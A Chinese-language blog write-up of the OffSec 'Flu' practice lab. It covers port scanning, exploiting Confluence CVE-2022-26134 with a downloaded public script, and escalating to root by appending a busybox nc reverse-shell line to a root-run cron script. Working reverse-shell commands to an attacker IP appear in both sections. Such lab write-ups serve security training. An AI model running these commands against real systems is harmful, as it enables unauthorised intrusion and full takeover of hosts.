OSCP Flu Write-up

本文最后更新于 2026年3月12日 下午

一、靶场详情

靶场名称:

Flu

靶场地址:

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界:

Confluence 远程代码执行 –> confluence 用户权限 –> 用户旗帜

权限提升:

信息收集 –> /opt/log-backup.sh –> pspy 进程监控 –> 修改/opt/log-backup.sh 为反弹 shell –> root 用户权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描:

1
2
3
4
5
6
sudo nmap -p- 192.168.189.41 --min-rate=2000

PORT STATE SERVICE
22/tcp open ssh
8090/tcp open opsmessaging
8091/tcp open jamlink

UDP 端口扫描:未发现有价值信息。

TCP 服务信息搜集:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
sudo nmap -p22,8090,8091 -sCV 192.168.189.41

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 02:79:64:84:da:12:97:23:77:8a:3a:60:20:96:ee:cf (ECDSA)
|_ 256 dd:49:a3:89:d7:57:ca:92:f0:6c:fe:59:a6:24:cc:87 (ED25519)
8090/tcp open http Apache Tomcat (language: en)
| http-title: Log In - Confluence
|_Requested resource was /login.action?os_destination=%2Findex.action&permissionViolation=true
|_http-trane-info: Problem with XML parsing of /evox/about
8091/tcp open jamlink?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 204 No Content
| Server: Aleph/0.4.6
| Date: Thu, 28 Aug 2025 07:20:28 GMT
| Connection: Close
| GetRequest:
| HTTP/1.1 204 No Content
| Server: Aleph/0.4.6
| Date: Thu, 28 Aug 2025 07:19:53 GMT
| Connection: Close
| HTTPOptions:
| HTTP/1.1 200 OK
| Access-Control-Allow-Origin: *
| Access-Control-Max-Age: 31536000
| Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
| Server: Aleph/0.4.6
| Date: Thu, 28 Aug 2025 07:19:54 GMT
| Connection: Close
| content-length: 0
| Help, Kerberos, LDAPSearchReq, LPDString, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 414 Request-URI Too Long
| text is empty (possibly HTTP/0.9)
| RTSPRequest:
| HTTP/1.1 200 OK
| Access-Control-Allow-Origin: *
| Access-Control-Max-Age: 31536000
| Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
| Server: Aleph/0.4.6
| Date: Thu, 28 Aug 2025 07:19:54 GMT
| Connection: Keep-Alive
| content-length: 0
| SIPOptions:
| HTTP/1.1 200 OK
| Access-Control-Allow-Origin: *
| Access-Control-Max-Age: 31536000
| Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
| Server: Aleph/0.4.6
| Date: Thu, 28 Aug 2025 07:20:35 GMT
| Connection: Keep-Alive
|_ content-length: 0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

系统为 Linux 环境,开放有 HTTP、SSH 服务。

3.2 渗透测试突破边界

3.2.1 Confluence 远程代码执行(CVE-2022-26134)

依次访问靶机 8090、8091 端口,发现 8090 端口部署了 Confluence 应用,并在页面暴露了应用版本:7.13.6。

搜索引擎检索,发现该版本存在远程代码执行漏洞(CVE-2022-26134)。

参考链接:

1
https://github.com/jbaines-r7/through_the_wire

下载漏洞利用脚本并执行,获取到系统 confluence 用户权限,注意: 脚本依赖本地 nc 工具建立反弹 shell,如果 nc 不在/usr/bin/nc,需指定 nc 具体位置(mac 系统自带的 nc 无法使用)。

1
2
wget https://raw.githubusercontent.com/jbaines-r7/through_the_wire/refs/heads/main/through_the_wire.py
python3.9 through_the_wire.py --rhost 192.168.189.41 --rport 8090 --lhost 192.168.45.221 --protocol http:// --reverse-shell --nc-path /opt/homebrew/bin/nc

获取交互式 shell。

1
2
3
4
5
# shell
busybox nc 192.168.45.221 1234 -e /bin/bash

# 宿主机
nc -lvnp 1234

3.2.2 用户旗帜获取

3.3 提权获取系统管理员权限

3.3.1 Pspy 进程监控,修改定时任务脚本提权至 root

在 opt 目录发现 log-backup.sh 脚本文件,并通过 pspy 得知系统会定时以 root 权限执行该文件,由于该文件属于 confluence 用户,可添加反弹 shell 获取系统 root 用户权限。

1
2
nc -lvnp 1234
echo "busybox nc 192.168.45.221 1234 -e /bin/bash" >> log-backup.sh

3.3.2 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流,欢迎点击「关于我」,通过页面中的微信公众号、邮箱或 Discord 与我联系;若您发现文章中存在任何错误或不足之处,也非常欢迎通过以上方式指出,在此一并致以衷心的感谢。 😊🫡

最后,祝您生活愉快!🌞✨


OSCP Flu Write-up
https://www.f0nesec.top/2025/08/28/oscp-flu/
作者
F0ne
发布于
2025年8月28日
许可协议